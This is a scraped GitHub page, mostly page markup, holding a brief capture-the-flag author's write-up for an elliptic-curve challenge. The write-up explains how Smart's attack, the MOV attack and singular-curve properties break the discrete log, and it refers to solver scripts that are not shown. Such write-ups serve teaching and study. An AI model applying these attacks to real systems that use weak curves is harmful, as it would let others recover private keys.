<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
**Author's Solve**
For Part 1, the order of the ECC curve is equal to the prime used for the field, aka `p`. So, an attack called Smart's attack can be applied on the curve which allows us to perform the discrete log of the curve in linear time. This paper (`https://wstein.org/edu/2010/414/projects/novotney.pdf`) goes over the details of why the attack works as well as a SageMath implementation method for the attack. The script `smarts_attack_solver.sage` is the solver for part 1.
For Part 2, the MOV attack can be used on the curves. The idea for the MOV attack is to take the curve and map the points to a different curve where the discrete log calculations would be easier. For that to happen, the embedding degree of the curve must be less than 6, aka `(p^k-1) % order = 0` and `k` is the embedding degree. With k<=6, it is possible to map the given points to the curve with field F(p^k) and quickly calculate the discrete log of the new points. The script `mov_attack_solver.sage` is the solver for part 2.
For Part 3, the given curve is a singular curve. In a singular curve, the parameters `a` and `b` satisfy the relationship `[4*(a^3) + 27*(b^2)] % p == 0`. This means that the discrete log is quick to calculate for this curve. The script `singular_curves_solver.sage` is the solver for part 3.
For the entire script implementation including server interaction, please check out `solution.sage`. |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" 